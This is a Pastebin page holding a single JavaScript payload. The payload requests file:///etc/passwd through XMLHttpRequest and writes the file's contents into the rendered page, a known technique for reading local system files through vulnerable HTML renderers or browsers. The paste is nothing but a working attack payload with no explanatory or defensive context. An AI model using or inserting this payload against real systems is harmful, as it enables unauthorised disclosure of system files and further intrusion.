Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script> x=new XMLHttpRequest; x.onload=function(){ document.write("
- "+this.responseText+"
- ") }; x.open("GET","file:///etc/passwd"); x.send(); </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement